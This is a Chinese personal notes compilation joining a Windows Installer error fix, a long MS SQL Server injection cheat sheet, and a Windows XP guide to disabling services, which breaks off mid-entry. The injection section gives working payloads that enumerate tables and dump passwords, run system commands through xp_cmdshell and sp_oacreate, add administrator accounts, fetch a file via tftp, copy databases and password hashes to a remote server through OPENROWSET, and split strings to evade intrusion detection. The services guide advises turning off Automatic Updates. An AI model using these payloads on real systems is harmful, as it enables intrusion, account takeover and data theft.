亮的MARK库

错误 1721。 Windows Installer 软件包有问题。. 此安装需要的程序不能运行。 请与支持个人或包厂商

解决方案 要解决此问题, “ Reregister WindowsInstaller 服务 “ 部分中执行步骤。 如果您执行这些步骤后, 遇到问题， 可能还需要执行步骤运行 “ 系统文件检查器 “ 部分中。

重新注册 WindowsInstaller 服务 WindowsInstaller 服务管理安装和删除的程序。 服务安装过程中应用一组规则集中定义安装 这些安装规则定义的安装程序安装和配置。 WindowsInstaller 使用 Microsoft 安装引擎来安装或删除程序。 如果损坏的 Microsoft 安装引擎注册, 可能不能要删除程序， 通过使用 WindowsInstaller 安装。 这时, 您需要注销并重新注册 WindowsInstaller 服务。 要这样做, 请按照下列步骤操作：1.以安全模式启动计算机。 要这样做, 请按照下列步骤操作： a. 重新启动计算机。 b. 显示 BIOS 信息后, 按 F 8 键。 c. 使用箭头键选择 SafeMode , 然后按 Enter。 d. 使用向上键和箭头键可以选择计算机, 然后按 Enter。

2.作为本地管理员登录到计算机。 3.然后单击 确定 、 开始 、 键入 cmd.exe , 和 运行 。 4.在命令提示符, 键入 msiexec / unregister , 然后按 Enter。 5.在命令提示符, 键入 msiexec/regserver , 然后按 Enter。 6.在命令提示符, 键入 退出 , 然后按 ENTER 键关闭命令提示符。 7.从添加或删除程序删除软件程序。

运行系统文件检查器 系统文件检查器 (Sfc.exe) 实用工具用于扫描受保护的操作系统文件以验证其版本和完整性。 如果系统文件检查器检测任何操作系统文件与正确文件版本, 它将用从 Windows 安装源文件具有正确版本文件替换损坏的文件。

要使用系统文件检查器, 请按照下列步骤： 1.然后单击 确定 、 开始 、 键入 cmd.exe , 和 运行 。 2.在命令提示符, 键入 sfc /purgecache , 然后按 Enter。

注意 您可能会提示运行 sfc /purgecache 命令时向 Windows 安装源文件。 如果是成功命令, 您将收到以下消息： Windows 文件保护成功进行请求更改。 3.在命令提示符, 键入 sfc/scannow , 然后按 Enter。

注意 此命令可能需要几分钟以完成。 可能还会提示运行 sfc/scannow 命令时向 Windows 安装源文件。 4.在命令提示符, 键入 退出 , 然后按 ENTER 键关闭命令提示符。 5.从添加或删除程序删除软件程序。

Ms Sql注射资料

Sql注射总结

Sql注射总结（早源于’or’1’=’1）

最重要的表名： select * from sysobjects sysobjects ncsysobjects sysindexes tsysindexes syscolumns systypes sysusers sysdatabases sysxlogins sysprocesses

最重要的一些用户名（默认sql数据库中存在着的） public dbo guest(一般禁止，或者没权限) db_sercurityadmin ab_dlladmin

一些默认扩展

xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite xp_availablemedia 驱动器相关 xp_dirtree 目录 xp_enumdsn ODBC连接 xp_loginconfig 服务器安全模式信息 xp_makecab 创建压缩卷 xp_ntsec_enumdomains domain信息 xp_terminate_process 终端进程，给出一个PID

例如： sp_addextendedproc ‘xp_webserver’, ‘c:\temp\xp_foo.dll’ exec xp_webserver sp_dropextendedproc ‘xp_webserver’ bcp “select * FROM test..foo” queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar ‘ group by users.id having 1=1- ‘ group by users.id, users.username, users.password, users.privs having 1=1- ‘; insert into users values( 666, ‘attacker’, ‘foobar’, 0xffff )-

union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’- union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’ where COLUMN_NAME NOT IN (‘login_id’)- union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’ where COLUMN_NAME NOT IN (‘login_id’,’login_name’)- union select TOP 1 login_name FROM logintable- union select TOP 1 password FROM logintable where login_name=’Rahul’– 构造语句：查询是否存在xp_cmdshell ‘ union select @@version,1,1,1– and 1=(select @@VERSION) and ‘sa’=(select System_user) ‘ union select ret,1,1,1 from foo– ‘ union select min(username),1,1,1 from users where username > ‘a’- ‘ union select min(username),1,1,1 from users where username > ‘admin’- ‘ union select password,1,1,1 from users where username = ‘admin’– and user_name()=’dbo’ and 0<>(select user_name()- ; DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C：\WINNT\system32\cmd.exe /c net user swap 5245886 /add’ and 1=(select count(*) FROM master.dbo.sysobjects where xtype = ‘X’ AND name = ‘xp_cmdshell’) ;EXEC master.dbo.sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’

1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=’x’%20and%20name=’xp_cmdshell’) and 1=(select IS_SRVROLEMEMBER(‘sysadmin’)) 判断sa权限是否 and 0<>(select top 1 paths from newtable)– 暴库大法 and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名（从1到5都是系统的id，6以上才可以判断） 创建一个虚拟目录E盘： declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w “默认 Web 站点” -v “e”,”e：\“‘ 访问属性：（配合写入一个webshell） declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec sp_oamethod @o, ‘run’, NULL,’ cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse’

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 依次提交 dbid = 7,8,9…. 得到更多的数据库名 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’) 暴到一个表 假设为 admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’ and name not in (‘Admin’)) 来得到其他的表。 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=’U’ and name=’admin’ and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in (‘id’,…)) 来暴出其他的字段 and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名 依次可以得到密码。。。。。假设存在user_id username ,password 等字段

Show.asp&id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin Show.asp&id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union语句到处风靡啊，access也好用

暴库特殊技巧：:%5c=’\‘ 或者把/和\ 修改%5提交 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’) 得到表名 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’ and name not in(‘Address’)) and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=’U’ and name=’admin’ and uid>(str(id))) 判断id值 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段

http://xx.xx.xx.xx/111.asp&id=3400;create table [dbo].[swap] ([swappass][char](255));–

http://xx.xx.xx.xx/111.asp&id=3400 and (select top 1 swappass from swap)=1 ;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=’HKEY_LOCAL_MACHINE’, @key=’SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\‘, @value_name=’/‘, values=@test OUTPUT insert into paths(path) values(@test)

http://61.131.96.39/PageShow.asp&TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp\_oacreate%20"wscript.shell",@s%20out;exec%20sp\_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--

得到了web路径d:\xxxx,接下来： http://xx.xx.xx.xx/111.asp&id=3400;use ku1;– http://xx.xx.xx.xx/111.asp&id=3400;create table cmd (str image);–

传统的存在xp_cmdshell的测试过程： ;exec master..xp_cmdshell ‘dir’ ;exec master.dbo.sp_addlogin hax;– ;exec master.dbo.sp_password null,hax,hax;– ;exec master.dbo.sp_addsrvrolemember hax sysadmin;– ;exec master.dbo.xp_cmdshell ‘net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;– ;exec master.dbo.xp_cmdshell ‘net localgroup administrators hax /add’;– exec master..xp_servicecontrol ‘start’, ‘schedule’ exec master..xp_servicecontrol ‘start’, ‘server’ http：//www.xxx.com/list.asp&classid=1; DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C：\WINNT\system32\cmd.exe /c net user swap 5258 /add’ ;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C：\WINNT\system32\cmd.exe /c net localgroup administrators swap/add’

http://localhost/show.asp&id=1‘; exec master..xp_cmdshell ‘tftp -i youip get file.exe’-

declare @a sysname set @a=’xp_‘+’cmdshell’ exec @a ‘dir c:\‘ declare @a sysname set @a=’xp’+’_cm’+’dshell’ exec @a ‘dir c:\‘ ;declare @a;set @a=db_name();backup database @a to disk=’你的IP你的共享目录bak.dat’ 如果被限制则可以。 select * from openrowset(‘sqloledb’,’server’;’sa’;’’,’select ‘’OK!’’ exec master.dbo.sp_addlogin hax’) 传统查询构造： select * FROM news where id=… AND topic=… AND ….. admin’and 1=(select count(*) from [user] where username=’victim’ and right(left(userpass,01),1)=’1’) and userpass <>’ select 123;– ;use master;– :a’ or name like ‘fff%’;– 显示有一个叫ffff的用户哈。 ‘and 1<>(select count(email) from [user]);– ;update [users] set email=(select top 1 name from sysobjects where xtype=’u’ and status>0) where name=’ffff’;– 说明: 上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 通过查看ffff的用户资料可得第一个用表叫ad 然后根据表名ad得到这个表的ID ffff’;update [users] set email=(select top 1 id from sysobjects where xtype=’u’ and name=’ad’) where name=’ffff’;–

象下面这样就可以得到第二个表的名字了 ffff’;update [users] set email=(select top 1 name from sysobjects where xtype=’u’ and id>581577110) where name=’ffff’;– ffff’;update [users] set email=(select top 1 count(id) from password) where name=’ffff’;– ffff’;update [users] set email=(select top 1 pwd from password where id=2) where name=’ffff’;–

ffff’;update [users] set email=(select top 1 name from password where id=2) where name=’ffff’;–

exec master..xp_servicecontrol ‘start’, ‘schedule’ exec master..xp_servicecontrol ‘start’, ‘server’ sp_addextendedproc ‘xp_webserver’, ‘c:\temp\xp_foo.dll’ 扩展存储就可以通过一般的方法调用： exec xp_webserver 一旦这个扩展存储执行过，可以这样删除它: sp_dropextendedproc ‘xp_webserver’

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-

insert into users values( 667,123,123,0xffff)-

insert into users values ( 123, ‘admin’’–’, ‘password’, 0xffff)-

;and user>0 ;;and (select count(*) from sysobjects)>0 ;;and (select count(*) from mysysobjects)>0 //为access数据库

-———————————————————-通常注射的一些介绍： A) ID=49 这类注入的参数是数字型，SQL语句原貌大致如下： select * from 表名 where 字段=49 注入的参数为ID=49 And [查询条件]，即是生成语句： select * from 表名 where 字段=49 And [查询条件]

(B) Class=连续剧 这类注入的参数是字符型，SQL语句原貌大致概如下： select * from 表名 where 字段=’连续剧’ 注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ，即是生成语句： select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’ (C) 搜索时没过滤参数的，如keyword=关键字，SQL语句原貌大致如下： select * from 表名 where 字段like ‘%关键字%’ 注入的参数为keyword=’ and [查询条件] and ‘%25’=’， 即是生成语句： select * from 表名 where字段like ‘%’ and [查询条件] and ‘%’=’%’ ;;and (select Top 1 name from sysobjects where xtype=’U’ and status>0)>0 sysobjects是SQLServer的系统表，存储着所有的表名、视图、约束及其它对象，xtype=’U’ and status>0，表示用户建立的表名，上面的语句将第一个表名取出，与0比较大小，让报错信息把表名暴露出来。 ;;and (select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0 从⑤拿到表名后，用object_id(‘表名’)获取表名对应的内部ID，col_name(表名ID,1)代表该表的第1个字段名，将1换成2,3,4…就可以逐个获取所猜解表里面的字段名。

post.htm内容：主要是方便输入。

枚举出他的数据表名： id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);– 这是将第一个表名更新到aaa的字段处。 读出第一个表，第二个表可以这样读出来（在条件后加上 and name<>’刚才得到的表名’）。 id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0 and name<>’vote’);– 然后id=1552 and exists(select * from aaa where aaa>5) 读出第二个表，^^^^^^一个个的读出，直到没有为止。 读字段是这样： id=1552;update aaa set aaa=(select top 1 col_name(object_id(‘表名’),1));– 然后id=1552 and exists(select * from aaa where aaa>5)出错，得到字段名 id=1552;update aaa set aaa=(select top 1 col_name(object_id(‘表名’),2));– 然后id=1552 and exists(select * from aaa where aaa>5)出错，得到字段名 ——————————–高级技巧： [获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名] update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>’你得到的表名’ 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(‘table1’,’table2’,…) 通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名] update 表名 set 字段=(select top 1 col_name(object_id(‘要查询的数据表名’),字段列如:1) [ where 条件]

绕过IDS的检测[使用变量] declare @a sysname set @a=’xp_‘+’cmdshell’ exec @a ‘dir c:\‘ declare @a sysname set @a=’xp’+’_cm’+’dshell’ exec @a ‘dir c:\‘

1、 开启远程数据库 基本语法 select * from OPENROWSET(‘SQLOLEDB’, ‘server=servername;uid=sa;pwd=apachy_123’, ‘select * from table1’ ) 参数: (1) OLEDB Provider name 2、 其中连接字符串参数可以是任何和端口用来连接,比如 select * from OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from table’

要复制目标主机的整个数据库，首先要在目标主机上和自己机器上的数据库建立连接(如何在目标主机上建立远程连接，刚才已经讲了),之后insert所有远程表到本地表。

基本语法： insert into OPENROWSET(‘SQLOLEDB’, ‘server=servername;uid=sa;pwd=apachy_123’, ‘select * from table1’) select * from table2 这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口，指向需要的地方，比如： insert into OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from table1’) select * from table2

insert into OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from _sysdatabases’) select * from master.dbo.sysdatabases

insert into OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from _sysobjects’) select * from user_database.dbo.sysobjects

insert into OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from _syscolumns’) select * from user_database.dbo.syscolumns

之后，便可以从本地数据库中看到目标主机的库结构，这已经易如反掌，不多讲，复制数据库： insert into OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from table1’) select * from database..table1

insert into OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from table2’) select * from database..table2

……

3、 复4、 制哈西表（HASH）

这实际上是上述复5、 制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下： insert into OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ‘select * from _sysxlogins’) select * from database.dbo.sysxlogins 得到hash之后，6、 就可以进行暴力破解。这需要一点运气和大量时间。

遍历目录的方法： 先创建一个临时表：temp ‘5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));– 5’;insert temp exec master.dbo.xp_availablemedia;– 获得当前所有驱动器 5’;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\‘;– 获得子目录列表 5’;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\‘;– 获得所有子目录的目录树结构,并寸入temp表中

5’;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp’;– 查看某个文件的内容 5’;insert into temp(id) exec master.dbo.xp_cmdshell ‘dir c:\‘;– 5’;insert into temp(id) exec master.dbo.xp_cmdshell ‘dir c:\ *.asp /s/a’;– 5’;insert into temp(id) exec master.dbo.xp_cmdshell ‘cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc’

5’;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\‘;– （xp_dirtree适用权限PUBLIC） 写入表： 语句1：http://www.xxxxx.com/down/list.asp&id=1　and　1=(select IS_SRVROLEMEMBER(‘sysadmin’));– 语句2：http://www.xxxxx.com/down/list.asp&id=1　and　1=(select IS_SRVROLEMEMBER(‘serveradmin’));– 语句3：http://www.xxxxx.com/down/list.asp&id=1　and　1=(select IS_SRVROLEMEMBER(‘setupadmin’));– 语句4：http://www.xxxxx.com/down/list.asp&id=1　and　1=(select IS_SRVROLEMEMBER(‘securityadmin’));– 语句5：http://www.xxxxx.com/down/list.asp&id=1　and　1=(select IS_SRVROLEMEMBER(‘securityadmin’));– 语句6：http://www.xxxxx.com/down/list.asp&id=1　and　1=(select IS_SRVROLEMEMBER(‘diskadmin’));– 语句7：http://www.xxxxx.com/down/list.asp&id=1　and　1=(select IS_SRVROLEMEMBER(‘bulkadmin’));– 语句8：http://www.xxxxx.com/down/list.asp&id=1　and　1=(select IS_SRVROLEMEMBER(‘bulkadmin’));– 语句9：http://www.xxxxx.com/down/list.asp&id=1　and　1=(select IS_MEMBER(‘db_owner’));– 把路径写到表中去： http://www.xxxxx.com/down/list.asp&id=1;create　table　dirs(paths varchar(100), id int)- http://http://www.xxxxx.com/down/list.asp&id=1;insert 　dirs　exec　master.dbo.xp_dirtree ‘c:\‘- http://http://www.xxxxx.com/down/list.asp&id=1　and　0<>(select　top　1　paths　from　dirs)- http://http://www.xxxxx.com/down/list.asp&id=1　and　0<>(select　top　1　paths　from　dirs　where　paths　not　in(‘@Inetpub’))- 语句：http://http://www.xxxxx.com/down/list.asp&id=1;create　table　dirs1(paths　varchar(100),　id　int)– 语句：http://http://www.xxxxx.com/down/list.asp&id=1;insert　dirs　exec　master.dbo.xp_dirtree ‘e:\web’– 语句：http://http://www.xxxxx.com/down/list.asp&id=1　and　0<>(select　top　1　paths　from　dirs1)- 把数据库备份到网页目录：下载 http://http://www.xxxxx.com/down/list.asp&id=1;declare　@a　sysname;　set　@a=db_name();backup　database　@a　to　disk=’e:\web\down.bak’;–

and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc) and%201=(select%20Top%201%20col_name(object_id(‘USER_LOGIN’),1)%20from%20sysobjects) 参看相关表。 and 1=(select%20user_id%20from%20USER_LOGIN) and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)

如果可以通过连接符注释掉后面的验证，那么就更有意思了，来看我们能作什么： a、在用户名位置输入【admin’;exec master.dbo.sp_addlogin Cool;–】，添加一个sql用户 b、在用户名位置输入【admin’;exec master.dbo.sp_password null,123456,Cool;–】，给Cool设置密码为123456 c、在用户名位置输入【admin’;exec master.dbo.sp_addsrvrolemember Cool,sysadmin;–】，给Cool赋予System Administrator权限

关闭你电脑上没用的服务(加快你的电脑运行) 在控制面板→管理工具→服务；指着建议为“已停用”的服务属性改成“已禁用”并按停止即可； Alerter 微软： 通知选取的使用者及计算机系统管理警示。如果停止这个服务，使用系统管理警示的程序将不会收到通知。如果停用这个服务，所有依存于它的服务将无法启动。 补充： 一般家用计算机根本不需要传送或接收计算机系统管理来的警示(Administrative Alerts)，除非你的计算机用在局域网络上 依存： Workstation 建议： 已停用 Application Layer Gateway Service 微软： 提供因特网联机共享和因特网联机防火墙的第三方通讯协议插件的支持 补充： 如果你不使用因特网联机共享 (ICS) 提供多台计算机的因特网存取和因特网联机防火墙 (ICF) 软件你可以关掉 依存： Internt Connection Firewall (ICF) / Internet Connection Sharing (ICS) 建议： 已停用 Application Management (应用程序管理) 微软： 提供指派、发行、以及移除的软件安装服务。 补充： 如上说的软件安装变更的服务 建议： 手动 Automatic Updates 微软： 启用重要 Windows 更新的下载及安装。如果停用此服务，可以手动的从 Windows Update 网站上更新操作系统。 补充： 允许 Windows 于背景自动联机之下，到 Microsoft Servers 自动检查和下载更新修补程序 建议： 已停用 Background Intelligent Transfer Service 微软： 使用闲置的网络频宽来传输数据。 补充： 经由 Via HTTP1.1 在背景传输资料的?#124;西，例如 Windows Update 就是以此为工作之一 依存： Remote Procedure Call (RPC) 和 Workstation 建议： 已停用 ClipBook (剪贴簿) 微软： 启用剪贴簿检视器以储存信息并与远程计算机共享。如果这个服务被停止，剪贴簿检视器将无法与远程计算机共享信息。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 把剪贴簿内的信息和其它台计算机分享，一般家用计算机根本用不到 依存： Network DDE 建议： 已停用 COM+ Event System (COM+ 事件系统) 微软： 支持「系统事件通知服务 (SENS)」，它可让事件自动分散到订阅的 COM 组件。如果服务被停止，SENS 会关闭，并无法提供登入及注销通知。如果此服务被停用，任何明显依存它的服务都无法启动。 补充： 有些程序可能用到 COM+ 组件，像 BootVis 的 optimize system 应用，如事件检视器内显示的 DCOM 没有启用 依存： Remote Procedure Call (RPC) 和 System Event Notification 建议： 手动 COM+ System Application 微软： 管理 COM+ 组件的设定及追踪。如果停止此服务，大部分的 COM+ 组件将无法适当?#092;作。如果此服务被停用，任何明确依存它的服务将无法启动。 补充： 如果 COM+ Event System 是一台车，那么 COM+ System Application 就是司机，如事件检视器内显示的 DCOM 没有启用 依存： Remote Procedure Call (RPC) 建议： 手动 Computer Browser (计算机浏览器) 微软： 维护网络上更新的计算机清单，并将这个清单提供给做为浏览器的计算机。如果停止这个服务，这个清单将不会被更新或维护。如果停用这个服务，所有依存于它的服务将无法启动。 补充： 一般家庭用计算机不需要，除非你的计算机应用在区网之上，不过在大型的区网上有必要开这个拖慢速度吗？ 依存： Server 和 Workstation 建议： 已停用 Cryptographic Services 微软： 提供三个管理服务: 确认 Windows 档案签章的 [类别目录数据库服务]; 从这个计算机新增及移除受信任根凭证授权凭证的 [受保护的根目录服务]; 以及协助注册这个计算机以取得凭证的 [金钥服务]。如果这个服务被停止，这些管理服务将无法正确工作。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 简单的说就是 Windows Hardware Quality Lab (WHQL)微软的一种认证，如果你有使用 Automatic Updates ，那你可能需要这个 依存： Remote Procedure Call (RPC) 建议： 手动 DHCP Client (DHCP 客户端) 微软： 透过登录及更新 IP 地址和 DNS 名称来管理网络设定。 补充： 使用 DSL/Cable 、ICS 和 IPSEC 的人都需要这个来指定动态 IP 依存： AFD 网络支持环境、NetBT、SYMTDI、TCP/IP Protocol Driver 和 NetBios over TCP/IP 建议： 手动 Distributed Link Tracking Client (分布式连结追踪客户端) 微软： 维护计算机中或网络网域不同计算机中 NTFS 档案间的连结。 补充： 维护区网内不同计算机之间的档案连结 依存： Remote Procedure Call (RPC) 建议： 已停用 Distributed Transaction Coordinator (分布式交易协调器) 微软： 协调跨越多个资源管理员的交易，比如数据库、讯息队列及档案系统。如果此服务被停止，这些交易将不会发生。如果服务被停用，任何明显依存它的服务将无法启动。 补充： 如上所说的，一般家庭用计算机用不太到，除非你启用的 Message Queuing 依存： Remote Procedure Call (RPC) 和 Security Accounts Manager 建议： 已停用 DNS Client (DNS 客户端) 微软： 解析并快取这台计算机的网域名称系统 (DNS) 名称。如果停止这个服务，这台计算机将无法解析 DNS 名称并寻找 Active Directory 网域控制站的位置。如果停用这个服务，所有依存于它的服务将无法启动。 补充： 如上所说的，另外 IPSEC 需要用到 依存： TCP/IP Protocol Driver 建议： 手动 Error Reporting Service 微软： 允许对执行于非标准环境中的服务和应用程序的错误报告。 补充： 微软的应用程序错误报告 依存： Remote Procedure Call (RPC) 建议： 已停用 Event Log (事件记录文件) 微软： 启用 Windows 为主的程序和组件所发出的事件讯息可以在事件检视器中检视。这个服务不能被停止。 补充： 允许事件讯息显示在事件检视器之上 依存： Windows Management Instrumentation 建议： 自动 Fast User Switching Compatibility 微软： 在多使用者环境下提供应用程序管理。 补充： 另外像是注销画面中的切换使用者功能 依存： Terminal Services 建议： 手动 Help and Support 微软： 让说明及支持中心能够在这台计算机上执行。如果这个服务停止，将无法使用说明及支持中心。如果这个服务被停用，它的所有依存服务将无法启动。 补充： 如果不使用就关了吧 依存： Remote Procedure Call (RPC) 建议： 已停用 Human Interface Device Access 微软： 启用对人性化接口装置 (HID) 的通用输入存取，HID 装置启动并维护对这个键盘、远程控制、以及其它多媒体装置上事先定义的快捷纽的使用。如果这个服务被停止，这个服务控制的快捷纽将不再起作用。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 如上所提到的 依存： Remote Procedure Call (RPC) 建议： 已停用 IMAPI CD-Burning COM Service 微软： 使用 Image Mastering Applications Programming Interface (IMAPI) 来管理光盘录制。如果这个服务被停止，这个计算机将无法录制光盘。如果这个服务被停用，任何明确地依赖它的服务将无法启动。 补充： XP 整合的 CD-R 和 CD-RW 光驱上拖放的烧录功能，可惜比不上烧录软件，关掉还可以加快 Nero 的开启速度 建议： 已停用 Indexing Service (索引服务) 微软： 本机和远程计算机的索引内容和档案属性; 透过弹性的查询语言提供快速档案存取。 补充： 简单的说可以让你加快搜查速度，不过我想应该很少人和远程计算机作搜寻吧 依存： Remote Procedure Call (RPC) 建议： 已停用 Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS) 微软： 为您的家用网络或小型办公室网络提供网络地址转译、寻址及名称解析服务和/或防止干扰的服务。 补充： 如果你不使用因特网联机共享(ICS)或是 XP 内含的因特网联机防火墙(ICF)你可以关掉 依存： Application Layer Gateway Service、Network Connections、Network Location Awareness(NLA)、Remote Access Connection Manager 建议： 已停用 IPSEC Services (IP 安全性服务) 微软： 管理 IP 安全性原则并启动 ISAKMP/Oakley (IKE) 及 IP 安全性驱动程序。 补充： 协助保护经由网络传送的数据。IPSec 为一重要环节，为虚拟私人网络 (VPN) 中提供安全性，而 VPN 允许组织经由因特网安全地传输数据。在某些网域上也许需要，但是一般使用者大部分是不太需要的 依存： IPSEC driver、Remote Procedure Call (RPC)、TCP/IP Protocol Driver 建议： 手动 Logical Disk Manager (逻辑磁盘管理员) 微软： 侦测及监视新硬盘磁盘，以及传送磁盘区信息到逻辑磁盘管理系统管理服务以供设定。如果这个服务被停止，动态磁盘状态和设定信息可能会过时。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 磁盘管理员用来动态管理磁盘，如显示磁盘可用空间等和使用 Microsoft Management Console(MMC)主控台的功能 依存： Plug and Play、Remote Procedure Call (RPC)、Logical Disk Manager Administrative Service 建议： 自动 Logical Disk Manager Administrative Service (逻辑磁盘管理员系统管理服务) 微软： 设定硬盘磁盘及磁盘区，服务只执行设定程序然后就停止。 补充： 使用 Microsoft Management Console(MMC)主控台的功能时才用到 依存： Plug and Play、Remote Procedure Call (RPC)、Logical Disk Manager 建议： 手动 Messenger (信差) 微软： 在客户端及服务器之间传输网络传送及 [Alerter] 服务讯息。这个服务与 Windows Messenger 无关。如果停止这个服务，Alerter 讯息将不会被传输。如果停用这个服务，所有依存于它的服务将无法启动。 补充： 允许网络之间互相传送提示讯息的功能，如 net send 功能，如不想被骚扰话可关了 依存： NetBIOS Interface、Plug and Play、Remote Procedure Call (RPC)、Workstation 建议： 已停用 MS Software Shadow Copy Provider 微软： 管理磁盘区阴影复制服务所取得的以软件为主的磁盘区阴影复制。如果停止这个服务，就无法管理以软件为主的磁盘区阴影复制。如果停用这个服务，任何明确依存于它的服务将无法启动。 补充： 如上所说的，用来备份的?#124;西，如 MS Backup 程序就需要这个服务 依存： Remote Procedure Call (RPC) 建议： 已停用 Net Logon 微软： 支持网域上计算机的账户登入事件的 pass-through 验证。 补充： 一般家用计算机不太可能去用到登入网域审查这个服务 依存： Workstation 建议： 已停用 NetMeeting Remote Desktop Sharing (NetMeeting 远程桌面共享) 微软： 让经过授权的使用者可以使用 NetMeeting 透过公司近端内部网络，由远程访问这部计算机。如果这项服务停止的话，远程桌面共享功能将无法使用。如果服务停用的话，任何依赖它的服务将无法启动。 补充： 如上说的，让使用者可以将计算机的控制权分享予网络上或因特网上的其它使用者，如果你重视安全性不想多开后门，就关了吧 建议： 已停用 Network Connections (网络联机) 微软： 管理在网络和拨号联机数据夹中的对象，您可以在此数据夹中检视局域网络和远程联机。 补充： 控制你的网络联机 依存： Remote Procedure Call (RPC)、Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS) 建议： 手动 Network DDE (网络 DDE) 微软： 为动态数据交换 (DDE) 对在相同或不同计算机上执行的程序提供网络传输和安全性。如果这个服务被停止，DDE 传输和安全性将无法使用。如果这个服务被停用，任何明确依存于它的服务将无法启动。 补充： 一般人好像用不到 依存： Network DDE DSDM、ClipBook 建议： 已停用 Network DDE DSDM (网络 DDE 